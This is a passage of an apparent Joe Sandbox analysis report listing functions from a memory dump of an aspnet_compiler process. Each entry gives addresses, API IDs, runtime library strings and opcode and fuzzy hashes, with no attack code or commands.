                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: d68b204b6dab68b33fd098a20e0e5dd79dd3f636016c6af955c0b2878a112339
                                                                • Instruction ID: c2f72d9a04788e4a1878a29fdd7a8d371397af81014bc2d91a98d03f5c19df22
                                                                • Opcode Fuzzy Hash: d68b204b6dab68b33fd098a20e0e5dd79dd3f636016c6af955c0b2878a112339
                                                                • Instruction Fuzzy Hash: 8B218E7290021AABCF21DF58CD41AEE73BCBB91710F444565F84693180DB70EA588BE1
                                                                Function 00B03DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: 9e0ce2d7e9a3bd4c565ee3ccacfafaf089b06b3978073cd6ac0c7356d6ac3ab8
                                                                • Instruction ID: 72e824316f0ab6f80c1abd40c0caf3d2c3d525cc404d4addf7150b0cc44ad0a5
                                                                • Opcode Fuzzy Hash: 9e0ce2d7e9a3bd4c565ee3ccacfafaf089b06b3978073cd6ac0c7356d6ac3ab8
                                                                • Instruction Fuzzy Hash: 822160B690021AABCB20AE65C9499EB7BECEB14B54F040665FC08D7281E7749A8487E1
                                                                Function 00A853A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC22F4
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 00AC2328
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AC22FC
                                                                • RTL: Resource at %p, xrefs: 00AC230B
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-871070163
                                                                • Opcode ID: d1395443d5d0488fbe66e727c6f126cec0a0f7e00cb93b780258cea31967c492
                                                                • Instruction ID: 63ca35183b71a5e3230dbe0fc107851f214964b1cd21953b5a57855c7b343f00
                                                                • Opcode Fuzzy Hash: d1395443d5d0488fbe66e727c6f126cec0a0f7e00cb93b780258cea31967c492
                                                                • Instruction Fuzzy Hash: 3D510472A007016BEF11AB38CD91FA773A8EF59360F114229FD09DF281EA71ED4187A0
                                                                Function 00A8EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AC24BD
                                                                • RTL: Re-Waiting, xrefs: 00AC24FA
                                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AC248D
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                • API String ID: 0-3177188983
                                                                • Opcode ID: bbee7f97b063ee0cc286b350b11e45066cb6b32a43d9c7b18eb251dd3b728a8c
                                                                • Instruction ID: 7135bdf3729417294e34ff8a21ce1a0b3426ea5fe89ff9fc1265cb59c1cb27df
                                                                • Opcode Fuzzy Hash: bbee7f97b063ee0cc286b350b11e45066cb6b32a43d9c7b18eb251dd3b728a8c
                                                                • Instruction Fuzzy Hash: B341E6B1A00204FFDB24EB68CE89FAB77B8EF45720F208619F5559B2C1D734E94187A0
                                                                Function 00A9FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: __fassign
                                                                • String ID:
                                                                • API String ID: 3965848254-0
                                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                • Instruction ID: ecebf661ce9d162607f991444dd5cf458b40dbd3e391810f95812903d8c1b8ec
                                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                • Instruction Fuzzy Hash: A0915B71E0424AEFDF28DFA8C845AEEB7F4EF55309F24807AD411E61A2E7305A41CB91
                                                                Function 00B15CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: $$0
                                                                • API String ID: 1302938615-389342756
                                                                • Opcode ID: b6567e57a33d0ab512c6384958928fcce948dbd1975dc8eacf567e684e4ad21e
                                                                • Instruction ID: 3fbb4754df7054724a38b14223ee2cd2fee5e577b08f40ea5ed6c9bc49ef6469
                                                                • Opcode Fuzzy Hash: b6567e57a33d0ab512c6384958928fcce948dbd1975dc8eacf567e684e4ad21e
                                                                • Instruction Fuzzy Hash: B7919E71D04A8ADEDF34CFA9D4856EDBBF1EF81310F9446EAD4A1A7291C3744A82CB50